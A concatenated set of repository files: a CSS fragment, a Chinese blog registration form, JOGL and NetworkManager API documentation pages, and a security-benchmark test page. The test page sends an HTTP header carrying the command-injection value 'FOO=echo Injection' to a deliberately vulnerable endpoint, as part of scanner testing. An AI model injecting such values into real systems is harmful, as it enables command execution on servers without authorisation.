overflow: hidden; } .item .carousel-caption h1 { font-size: 20px; } .carousel-caption .lead, .carousel-caption .btn { font-size: 13px; line-height: 13px; max-height: 50px; overflow: hidden; } .carousel-caption .btn { padding: 7px; } .tc-carousel-control { font-size: 90px; height: 32px; } .social-block a { font-size: 1em; } .sticky-enabled .brand .site-title { font-size: 0.5em; display: -webkit-box; -webkit-line-clamp: 1; -webkit-box-orient: vertical; overflow: hidden; } .sticky-enabled .brand h1, .sticky-enabled .brand a { margin: 10px 0px 0px; } .navbar-inner .social-block a { padding-right: 6px; } } @media (max-width: 320px) { .carousel .item { line-height: 140px; overflow: hidden; min-height: 140px; } .carousel-caption { padding: 2%; } .item .carousel-caption h1 { font-size: 16px; } .carousel-caption .btn { padding: 5px; } .social-block a { font-size: 0.9em; } .navbar .navbar-inner .social-block { margin: 10px 0 0; font-size: 0.95em; } }
blog/view/user/register.html
huolong1992/baixiu
<!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" type="text/css" href="{*$MIN*}/?f={*$MIN_PUBLIC*}/css/login.css&v=1.0"> </head> <body> <!--main--> <div class="main"> <div class="user"> <img src="{*$PUBLIC*}/images/user.png" alt=""> </div> <div class="login"> <div class="inset"> <form id="form" action="{*$CONTROLLER*}/registerAction" method="post"> <div> <span><label>用户名</label><label id="error-user">长度在6~30个字符</label></span> <span><input type="text" class="textbox" id="username" name="username"></span> </div> <div> <span><label>邮箱</label><label id="error-mail">长度在5~50个字符</label></span> <span><input type="text" class="textbox" id="email" name="email"></span> </div> <div> <span><label>密码</label><label id="error-pass">长度在6~20个字符</label></span> <span><input type="password" class="password" id="password" name="password"></span> </div> <div> <span><label>验证码</label><label id="error-verify"></label></span> <span><input type="text" class="password" name="verify" id="verify"></span> <span><img src="{*$CONTROLLER*}/verify?rd={*$rd*}" onclick="javascript:this.src+='&rand='+Math.random()" alt="验证码" id="imgVerify" /><a href="javascript:void(0);" onclick="javascript:this.previousSibling.src+='&rand='+Math.random()">看不清?换一张</a></span> </div> <div class="sign"> <div class="submit"> <input type="button" id="register" name="register" value="注册" > <input type="hidden" name="token" value="<?=$token?>"> </div> <span class="forget-pass"> <a id="change" href="{*$CONTROLLER*}/login">已注册?点击登录</a> </span> <div class="clear"> </div> </div> <input type="hidden" name="token" value="{*$token*}"> </form> </div> </div> </div> <script type="text/javascript" src="{*$MIN*}/?b={*$MIN_PUBLIC*}/js&f=event.js,ajax.js"></script> <script type="text/javascript"> /////////////获得各个input框的节点 var username = document.getElementById('username'); var password = document.getElementById('password'); var email = document.getElementById('email'); var verify = document.getElementById('verify'); var form = document.getElementById('form'); var btn = document.getElementById('register'); ////////////获得各个input框的错误提示节点 var eUser = document.getElementById('error-user'); var eMail = document.getElementById('error-mail'); var ePass = document.getElementById('error-pass'); var eVerify = document.getElementById('error-verify'); ///////////验证码是否正确 /////由于ajax回调函数里不能返回true/false ////所以这里用一个全局变量来标志 var flag = false; /////////////事件委托方式(适合于同一页面大量的事件绑定) Event.add(document,'keyup',function(event){ event = Event.getEvent(event); var target = Event.getTarget(event); setTimeout(function(){ //////////根据节点的不同... switch(target.id){ case username.id: showError(target,eUser,6,30); break; case password.id: showError(target,ePass,6,20); break; case email.id: showError(target,eMail,5,50); break; case verify.id: verifyCheck(); break; } },0); },false); /*//////////////监听username的onkeyup事件 Event.add(username,'keyup',function(event){ ///加上延迟执行才能达到预期的目的 ///否则只有到输入7个字符时才隐藏错误 event = Event.getEvent(event); var target = Event.getTarget(event); setTimeout(function(){ var user = document.getElementById('error-user'); showError(target,user,6,30); },0); }); //////////////监听email的onkeyup事件 Event.add(email,'keyup',function(event){ ///加上延迟执行才能达到预期的目的 ///否则只有到输入7个字符时才隐藏错误 event = Event.getEvent(event); var target = Event.getTarget(event); setTimeout(function(){ var user = document.getElementById('error-mail'); showError(target,user,5,50); },0); }); ///////////////注册password的onkeyup事件 Event.add(password,'keyup',function(event){ ///加上延迟执行才能达到预期的目的 ///否则只有到输入7个字符时才隐藏错误 event = Event.getEvent(event); var target = Event.getTarget(event); setTimeout(function(){ var user = document.getElementById('error-pass'); showError(target,user,6,20); },0); }); //////////////注册verify的onkeyup事件 Event.add(verify,'keyup',function(event){ verifyCheck(); });*/ //////////////注册form的onsubmit事件 //因为按下enter键提交表单时也会触发keyup事件, //所以这里要阻止提交表单 Event.add(form,'submit',function(event){ event = Event.getEvent(event); Event.preventDefault(event); }); ////////////注册button的onclick事件 Event.add(btn,'click',function(event){ event = Event.getEvent(event); var target = Event.getTarget(event); if(showError(username,eUser,6,30) && showError(email,eMail,5,50) && showError(password,ePass,6,20)){ verifyCheck(); if(flag){ form.submit(); } }else{ return false; } }) /** *验证输入或显示错误 */ function showError(dest,error,min,max){ if(dest.value.length<min || dest.value.length>max){ error.style.visibility = 'visible'; return false; }else{ error.style.visibility = 'hidden'; return true; } } /** *验证码验证 */ function verifyCheck(){ eVerify.style.visibility = 'visible'; var url = '{*$CONTROLLER*}/verifyCheck?verify='+verify.value; var options = { onsuccess:function(data){ if(data=='1'){ eVerify.innerHTML = 'ok'; flag = true; }else{ eVerify.innerHTML = '验证码不正确'; flag = false; } }, onerror:function(data){ flag = false; } } Ajax.send(url,options); } </script> </body> </html>
SGDE2/jogl-javadoc/jogl/javadoc/javax/media/nativewindow/util/PointImmutable.html
Nekel-Seyew/sweeney-game-development-environment-2
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_25) on Sun Jul 21 05:09:15 CEST 2013 --> <title>PointImmutable (JOGL, NativeWindow and NEWT APIs)</title> <meta name="date" content="2013-07-21"> <link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="PointImmutable (JOGL, NativeWindow and NEWT APIs)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-all.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../javax/media/nativewindow/util/Point.html" title="class in javax.media.nativewindow.util"><span class="strong">Prev Class</span></a></li> <li><a href="../../../../javax/media/nativewindow/util/Rectangle.html" title="class in javax.media.nativewindow.util"><span class="strong">Next Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../../index.html?javax/media/nativewindow/util/PointImmutable.html" target="_top">Frames</a></li> <li><a href="PointImmutable.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method_summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method_detail">Method</a></li> </ul> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">javax.media.nativewindow.util</div> <h2 title="Interface PointImmutable" class="title">Interface PointImmutable</h2> </div> <div class="contentContainer"> <div class="description"> <ul class="blockList"> <li class="blockList"> <dl> <dt>All Superinterfaces:</dt> <dd><a href="http://docs.oracle.com/javase/6/docs/api/java/lang/Comparable.html?is-external=true" title="class or interface in java.lang">Comparable</a>&lt;<a href="../../../../javax/media/nativewindow/util/PointImmutable.html" title="interface in javax.media.nativewindow.util">PointImmutable</a>&gt;, <a href="../../../../../../gluegen/javadoc/com/jogamp/common/type/WriteCloneable.html?is-external=true" title="class or interface in com.jogamp.common.type">WriteCloneable</a></dd> </dl> <dl> <dt>All Known Implementing Classes:</dt> <dd><a href="../../../../javax/media/nativewindow/util/Point.html" title="class in javax.media.nativewindow.util">Point</a></dd> </dl> <hr> <br> <pre>public interface <span class="strong">PointImmutable</span> extends <a href="../../../../../../gluegen/javadoc/com/jogamp/common/type/WriteCloneable.html?is-external=true" title="class or interface in com.jogamp.common.type">WriteCloneable</a>, <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/Comparable.html?is-external=true" title="class or interface in java.lang">Comparable</a>&lt;<a href="../../../../javax/media/nativewindow/util/PointImmutable.html" title="interface in javax.media.nativewindow.util">PointImmutable</a>&gt;</pre> <div class="block">Immutable Point interface</div> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method_summary"> <!-- --> </a> <h3>Method Summary</h3> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation"> <caption><span>Methods</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tr class="altColor"> <td class="colFirst"><code>int</code></td> <td class="colLast"><code><strong><a href="../../../../javax/media/nativewindow/util/PointImmutable.html#compareTo(javax.media.nativewindow.util.PointImmutable)">compareTo</a></strong>(<a href="../../../../javax/media/nativewindow/util/PointImmutable.html" title="interface in javax.media.nativewindow.util">PointImmutable</a>&nbsp;d)</code> <div class="block"> Compares the square of the position.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>boolean</code></td> <td class="colLast"><code><strong><a href="../../../../javax/media/nativewindow/util/PointImmutable.html#equals(java.lang.Object)">equals</a></strong>(<a href="http://docs.oracle.com/javase/6/docs/api/java/lang/Object.html?is-external=true" title="class or interface in java.lang">Object</a>&nbsp;obj)</code> <div class="block">Checks whether two points objects are equal.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>int</code></td> <td class="colLast"><code><strong><a href="../../../../javax/media/nativewindow/util/PointImmutable.html#getX()">getX</a></strong>()</code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>int</code></td> <td class="colLast"><code><strong><a href="../../../../javax/media/nativewindow/util/PointImmutable.html#getY()">getY</a></strong>()</code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>int</code></td> <td class="colLast"><code><strong><a href="../../../../javax/media/nativewindow/util/PointImmutable.html#hashCode()">hashCode</a></strong>()</code>&nbsp;</td> </tr> </table> <ul class="blockList"> <li class="blockList"><a name="methods_inherited_from_class_com.jogamp.common.type.WriteCloneable"> <!-- --> </a> <h3>Methods inherited from interface&nbsp;com.jogamp.common.type.<a href="../../../../../../gluegen/javadoc/com/jogamp/common/type/WriteCloneable.html?is-external=true" title="class or interface in com.jogamp.common.type">WriteCloneable</a></h3> <code><a href="../../../../../../gluegen/javadoc/com/jogamp/common/type/WriteCloneable.html?is-external=true#cloneMutable()" title="class or interface in com.jogamp.common.type">cloneMutable</a></code></li> </ul> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- ============ METHOD DETAIL ========== --> <ul class="blockList"> <li class="blockList"><a name="method_detail"> <!-- --> </a> <h3>Method Detail</h3> <a name="getX()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getX</h4> <pre>int&nbsp;getX()</pre> </li> </ul> <a name="getY()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getY</h4> <pre>int&nbsp;getY()</pre> </li> </ul> <a name="compareTo(javax.media.nativewindow.util.PointImmutable)"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>compareTo</h4> <pre>int&nbsp;compareTo(<a href="../../../../javax/media/nativewindow/util/PointImmutable.html" title="interface in javax.media.nativewindow.util">PointImmutable</a>&nbsp;d)</pre> <div class="block"><p> Compares the square of the position. </p> </div> <dl> <dt><strong>Specified by:</strong></dt> <dd><code><a href="http://docs.oracle.com/javase/6/docs/api/java/lang/Comparable.html?is-external=true#compareTo(T)" title="class or interface in java.lang">compareTo</a></code>&nbsp;in interface&nbsp;<code><a href="http://docs.oracle.com/javase/6/docs/api/java/lang/Comparable.html?is-external=true" title="class or interface in java.lang">Comparable</a>&lt;<a href="../../../../javax/media/nativewindow/util/PointImmutable.html" title="interface in javax.media.nativewindow.util">PointImmutable</a>&gt;</code></dd> </dl> </li> </ul> <a name="equals(java.lang.Object)"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>equals</h4> <pre>boolean&nbsp;equals(<a href="http://docs.oracle.com/javase/6/docs/api/java/lang/Object.html?is-external=true" title="class or interface in java.lang">Object</a>&nbsp;obj)</pre> <div class="block">Checks whether two points objects are equal. Two instances of <code>PointReadOnly</code> are equal if the two components <code>y</code> and <code>x</code> are equal.</div> <dl> <dt><strong>Overrides:</strong></dt> <dd><code><a href="http://docs.oracle.com/javase/6/docs/api/java/lang/Object.html?is-external=true#equals(java.lang.Object)" title="class or interface in java.lang">equals</a></code>&nbsp;in class&nbsp;<code><a href="http://docs.oracle.com/javase/6/docs/api/java/lang/Object.html?is-external=true" title="class or interface in java.lang">Object</a></code></dd> <dt><span class="strong">Returns:</span></dt><dd><code>true</code> if the two points are equal; otherwise <code>false</code>.</dd></dl> </li> </ul> <a name="hashCode()"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>hashCode</h4> <pre>int&nbsp;hashCode()</pre> <dl> <dt><strong>Overrides:</strong></dt> <dd><code><a href="http://docs.oracle.com/javase/6/docs/api/java/lang/Object.html?is-external=true#hashCode()" title="class or interface in java.lang">hashCode</a></code>&nbsp;in class&nbsp;<code><a href="http://docs.oracle.com/javase/6/docs/api/java/lang/Object.html?is-external=true" title="class or interface in java.lang">Object</a></code></dd> </dl> </li> </ul> </li> </ul> </li> </ul> </div> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-all.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../javax/media/nativewindow/util/Point.html" title="class in javax.media.nativewindow.util"><span class="strong">Prev Class</span></a></li> <li><a href="../../../../javax/media/nativewindow/util/Rectangle.html" title="class in javax.media.nativewindow.util"><span class="strong">Next Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../../index.html?javax/media/nativewindow/util/PointImmutable.html" target="_top">Frames</a></li> <li><a href="PointImmutable.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method_summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method_detail">Method</a></li> </ul> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small>Copyright 2010 JogAmp Community.</small></p> </body> </html>
src/main/webapp/BenchmarkTest01066.html
thc202/Benchmark
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <script src="js/jquery.min.js"></script> <script type="text/javascript" src="js/js.cookie.js"></script> <title>BenchmarkTest01066</title> </head> <body> <form action="/benchmark/BenchmarkTest01066" method="POST" id="FormBenchmarkTest01066"> <div><label>Please explain your answer:</label></div> <br/> <div><textarea rows="4" cols="50" id="vectorArea" name="vectorArea"></textarea></div> <div><label>Any additional note for the reviewer:</label></div> <div><input type="text" id="answer" name="answer"></input></div> <br/> <div><label>An AJAX request will be sent with a header named vector and value:</label> <input type="text" id="vector" name="vector" value="FOO=echo Injection" class="safe"></input></div> <div><input type="button" id="login-btn" value="Login" /></div> </form> <div id="ajax-form-msg1"><pre><code class="prettyprint" id="code"></code></pre></div> <script> $('.safe').keypress(function (e) { if (e.which == 13) { $('#login-btn').trigger('click'); return false; } }); $("#login-btn").click(function(){ var formData = $("#FormBenchmarkTest01066").serializeArray(); var URL = $("#FormBenchmarkTest01066").attr("action"); var text = $("#FormBenchmarkTest01066 input[id=vector]").val(); $.ajax({ url : URL, headers: { 'vector': text }, type: "POST", data : formData, success: function(data, textStatus, jqXHR){ $("#code").text(data); }, error: function (jqXHR, textStatus, errorThrown){ console.error(errorThrown);} }); }); </script> </body> </html>
docs/libnm-glib/html/NMDeviceBond.html
vzupanovic/Network-Manager-p.0.9.8.2
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>NMDeviceBond</title> <meta name="generator" content="DocBook XSL Stylesheets V1.78.1"> <link rel="home" href="index.html" title="libnm-glib Reference Manual"> <link rel="up" href="ch02.html" title="libnm-glib API Reference"> <link rel="prev" href="NMDeviceAdsl.html" title="NMDeviceAdsl"> <link rel="next" href="NMDeviceBridge.html" title="NMDeviceBridge"> <meta name="generator" content="GTK-Doc V1.18 (XML mode)"> <link rel="stylesheet" href="style.css" type="text/css"> </head> <body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"> <table class="navigation" id="top" width="100%" summary="Navigation header" cellpadding="2" cellspacing="2"> <tr valign="middle"> <td><a accesskey="p" href="NMDeviceAdsl.html"><img src="left.png" width="24" height="24" border="0" alt="Prev"></a></td> <td><a accesskey="u" href="ch02.html"><img src="up.png" width="24" height="24" border="0" alt="Up"></a></td> <td><a accesskey="h" href="index.html"><img src="home.png" width="24" height="24" border="0" alt="Home"></a></td> <th width="100%" align="center">libnm-glib Reference Manual</th> <td><a accesskey="n" href="NMDeviceBridge.html"><img src="right.png" width="24" height="24" border="0" alt="Next"></a></td> </tr> <tr><td colspan="5" class="shortcuts"> <a href="#NMDeviceBond.synopsis" class="shortcut">Top</a>  |  <a href="#NMDeviceBond.description" class="shortcut">Description</a>  |  <a href="#NMDeviceBond.object-hierarchy" class="shortcut">Object Hierarchy</a>  |  <a href="#NMDeviceBond.implemented-interfaces" class="shortcut">Implemented Interfaces</a>  |  <a href="#NMDeviceBond.properties" class="shortcut">Properties</a> </td></tr> </table> <div class="refentry"> <a name="NMDeviceBond"></a><div class="titlepage"></div> <div class="refnamediv"><table width="100%"><tr> <td valign="top"> <h2><span class="refentrytitle"><a name="NMDeviceBond.top_of_page"></a>NMDeviceBond</span></h2> <p>NMDeviceBond</p> </td> <td valign="top" align="right"></td> </tr></table></div> <div class="refsynopsisdiv"> <a name="NMDeviceBond.synopsis"></a><h2>Synopsis</h2> <pre class="synopsis"> <a class="link" href="NMDeviceBond.html#NMDeviceBond-struct" title="NMDeviceBond">NMDeviceBond</a>; <a class="link" href="NMDeviceBond.html#NMDeviceBondClass" title="NMDeviceBondClass">NMDeviceBondClass</a>; enum <a class="link" href="NMDeviceBond.html#NMDeviceBondError" title="enum NMDeviceBondError">NMDeviceBondError</a>; #define <a class="link" href="NMDeviceBond.html#NM-DEVICE-BOND-CARRIER:CAPS" title="NM_DEVICE_BOND_CARRIER">NM_DEVICE_BOND_CARRIER</a> #define <a class="link" href="NMDeviceBond.html#NM-DEVICE-BOND-ERROR:CAPS" title="NM_DEVICE_BOND_ERROR">NM_DEVICE_BOND_ERROR</a> #define <a class="link" href="NMDeviceBond.html#NM-DEVICE-BOND-HW-ADDRESS:CAPS" title="NM_DEVICE_BOND_HW_ADDRESS">NM_DEVICE_BOND_HW_ADDRESS</a> #define <a class="link" href="NMDeviceBond.html#NM-DEVICE-BOND-SLAVES:CAPS" title="NM_DEVICE_BOND_SLAVES">NM_DEVICE_BOND_SLAVES</a> <a href="http://library.gnome.org/devel/glib/unstable/glib-Quarks.html#GQuark"><span class="returnvalue">GQuark</span></a> <a class="link" href="NMDeviceBond.html#nm-device-bond-error-quark" title="nm_device_bond_error_quark ()">nm_device_bond_error_quark</a> (<em class="parameter"><code><span class="type">void</span></code></em>); <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gboolean"><span class="returnvalue">gboolean</span></a> <a class="link" href="NMDeviceBond.html#nm-device-bond-get-carrier" title="nm_device_bond_get_carrier ()">nm_device_bond_get_carrier</a> (<em class="parameter"><code><a class="link" href="NMDeviceBond.html" title="NMDeviceBond"><span class="type">NMDeviceBond</span></a> *device</code></em>); const <span class="returnvalue">char</span> * <a class="link" href="NMDeviceBond.html#nm-device-bond-get-hw-address" title="nm_device_bond_get_hw_address ()">nm_device_bond_get_hw_address</a> (<em class="parameter"><code><a class="link" href="NMDeviceBond.html" title="NMDeviceBond"><span class="type">NMDeviceBond</span></a> *device</code></em>); const <a href="http://library.gnome.org/devel/glib/unstable/glib-Pointer-Arrays.html#GPtrArray"><span class="returnvalue">GPtrArray</span></a> * <a class="link" href="NMDeviceBond.html#nm-device-bond-get-slaves" title="nm_device_bond_get_slaves ()">nm_device_bond_get_slaves</a> (<em class="parameter"><code><a class="link" href="NMDeviceBond.html" title="NMDeviceBond"><span class="type">NMDeviceBond</span></a> *device</code></em>); <a href="http://library.gnome.org/devel/gobject/unstable/gobject-The-Base-Object-Type.html#GObject"><span class="returnvalue">GObject</span></a> * <a class="link" href="NMDeviceBond.html#nm-device-bond-new" title="nm_device_bond_new ()">nm_device_bond_new</a> (<em class="parameter"><code><span class="type">DBusGConnection</span> *connection</code></em>, <em class="parameter"><code>const <span class="type">char</span> *path</code></em>); </pre> </div> <div class="refsect1"> <a name="NMDeviceBond.object-hierarchy"></a><h2>Object Hierarchy</h2> <pre class="synopsis"> <a href="http://library.gnome.org/devel/gobject/unstable/gobject-The-Base-Object-Type.html#GObject">GObject</a> +----<a class="link" href="NMObject.html" title="NMObject">NMObject</a> +----<a class="link" href="NMDevice.html" title="NMDevice">NMDevice</a> +----NMDeviceBond </pre> </div> <div class="refsect1"> <a name="NMDeviceBond.implemented-interfaces"></a><h2>Implemented Interfaces</h2> <p> NMDeviceBond implements <a href="http://library.gnome.org/devel/gio/unstable/GInitable.html">GInitable</a> and <a href="http://library.gnome.org/devel/gio/unstable/GAsyncInitable.html">GAsyncInitable</a>.</p> </div> <div class="refsect1"> <a name="NMDeviceBond.properties"></a><h2>Properties</h2> <pre class="synopsis"> "<a class="link" href="NMDeviceBond.html#NMDeviceBond--carrier" title='The "carrier" property'>carrier</a>" <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gboolean"><span class="type">gboolean</span></a> : Read "<a class="link" href="NMDeviceBond.html#NMDeviceBond--hw-address" title='The "hw-address" property'>hw-address</a>" <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="type">gchar</span></a>* : Read "<a class="link" href="NMDeviceBond.html#NMDeviceBond--slaves" title='The "slaves" property'>slaves</a>" <span class="type">NMObjectArray</span>* : Read </pre> </div> <div class="refsect1"> <a name="NMDeviceBond.description"></a><h2>Description</h2> <p> </p> </div> <div class="refsect1"> <a name="NMDeviceBond.details"></a><h2>Details</h2> <div class="refsect2"> <a name="NMDeviceBond-struct"></a><h3>NMDeviceBond</h3> <pre class="programlisting">typedef struct _NMDeviceBond NMDeviceBond;</pre> <p> </p> </div> <hr> <div class="refsect2"> <a name="NMDeviceBondClass"></a><h3>NMDeviceBondClass</h3> <pre class="programlisting">typedef struct { NMDeviceClass parent; /* Padding for future expansion */ void (*_reserved1) (void); void (*_reserved2) (void); void (*_reserved3) (void); void (*_reserved4) (void); void (*_reserved5) (void); void (*_reserved6) (void); } NMDeviceBondClass; </pre> <p> </p> </div> <hr> <div class="refsect2"> <a name="NMDeviceBondError"></a><h3>enum NMDeviceBondError</h3> <pre class="programlisting">typedef enum { NM_DEVICE_BOND_ERROR_UNKNOWN = 0, /*&lt; nick=UnknownError &gt;*/ NM_DEVICE_BOND_ERROR_NOT_BOND_CONNECTION, /*&lt; nick=NotBondConnection &gt;*/ NM_DEVICE_BOND_ERROR_INVALID_BOND_CONNECTION, /*&lt; nick=InvalidBondConnection &gt;*/ NM_DEVICE_BOND_ERROR_INTERFACE_MISMATCH, /*&lt; nick=InterfaceMismatch &gt;*/ } NMDeviceBondError; </pre> <div class="variablelist"><table border="0" class="variablelist"> <colgroup> <col align="left" valign="top"> <col> </colgroup> <tbody> <tr> <td><p><a name="NM-DEVICE-BOND-ERROR-UNKNOWN:CAPS"></a><span class="term"><code class="literal">NM_DEVICE_BOND_ERROR_UNKNOWN</code></span></p></td> <td>unknown or unclassified error </td> </tr> <tr> <td><p><a name="NM-DEVICE-BOND-ERROR-NOT-BOND-CONNECTION:CAPS"></a><span class="term"><code class="literal">NM_DEVICE_BOND_ERROR_NOT_BOND_CONNECTION</code></span></p></td> <td>the connection was not of bond type </td> </tr> <tr> <td><p><a name="NM-DEVICE-BOND-ERROR-INVALID-BOND-CONNECTION:CAPS"></a><span class="term"><code class="literal">NM_DEVICE_BOND_ERROR_INVALID_BOND_CONNECTION</code></span></p></td> <td>the bond connection was invalid </td> </tr> <tr> <td><p><a name="NM-DEVICE-BOND-ERROR-INTERFACE-MISMATCH:CAPS"></a><span class="term"><code class="literal">NM_DEVICE_BOND_ERROR_INTERFACE_MISMATCH</code></span></p></td> <td>the interfaces of the connection and the device mismatched </td> </tr> </tbody> </table></div> </div> <hr> <div class="refsect2"> <a name="NM-DEVICE-BOND-CARRIER:CAPS"></a><h3>NM_DEVICE_BOND_CARRIER</h3> <pre class="programlisting">#define NM_DEVICE_BOND_CARRIER "carrier" </pre> <p> </p> </div> <hr> <div class="refsect2"> <a name="NM-DEVICE-BOND-ERROR:CAPS"></a><h3>NM_DEVICE_BOND_ERROR</h3> <pre class="programlisting">#define NM_DEVICE_BOND_ERROR nm_device_bond_error_quark () </pre> <p> </p> </div> <hr> <div class="refsect2"> <a name="NM-DEVICE-BOND-HW-ADDRESS:CAPS"></a><h3>NM_DEVICE_BOND_HW_ADDRESS</h3> <pre class="programlisting">#define NM_DEVICE_BOND_HW_ADDRESS "hw-address" </pre> <p> </p> </div> <hr> <div class="refsect2"> <a name="NM-DEVICE-BOND-SLAVES:CAPS"></a><h3>NM_DEVICE_BOND_SLAVES</h3> <pre class="programlisting">#define NM_DEVICE_BOND_SLAVES "slaves" </pre> <p> </p> </div> <hr> <div class="refsect2"> <a name="nm-device-bond-error-quark"></a><h3>nm_device_bond_error_quark ()</h3> <pre class="programlisting"><a href="http://library.gnome.org/devel/glib/unstable/glib-Quarks.html#GQuark"><span class="returnvalue">GQuark</span></a> nm_device_bond_error_quark (<em class="parameter"><code><span class="type">void</span></code></em>);</pre> <p> Registers an error quark for <a class="link" href="NMDeviceBond.html" title="NMDeviceBond"><span class="type">NMDeviceBond</span></a> if necessary. </p> <div class="variablelist"><table border="0" class="variablelist"> <colgroup> <col align="left" valign="top"> <col> </colgroup> <tbody><tr> <td><p><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></p></td> <td>the error quark used for <a class="link" href="NMDeviceBond.html" title="NMDeviceBond"><span class="type">NMDeviceBond</span></a> errors.</td> </tr></tbody> </table></div> </div> <hr> <div class="refsect2"> <a name="nm-device-bond-get-carrier"></a><h3>nm_device_bond_get_carrier ()</h3> <pre class="programlisting"><a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gboolean"><span class="returnvalue">gboolean</span></a> nm_device_bond_get_carrier (<em class="parameter"><code><a class="link" href="NMDeviceBond.html" title="NMDeviceBond"><span class="type">NMDeviceBond</span></a> *device</code></em>);</pre> <p> Whether the device has carrier. </p> <div class="variablelist"><table border="0" class="variablelist"> <colgroup> <col align="left" valign="top"> <col> </colgroup> <tbody> <tr> <td><p><span class="term"><em class="parameter"><code>device</code></em> :</span></p></td> <td>a <a class="link" href="NMDeviceBond.html" title="NMDeviceBond"><span class="type">NMDeviceBond</span></a> </td> </tr> <tr> <td><p><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></p></td> <td> <a href="http://library.gnome.org/devel/glib/unstable/glib-Standard-Macros.html#TRUE:CAPS"><code class="literal">TRUE</code></a> if the device has carrier</td> </tr> 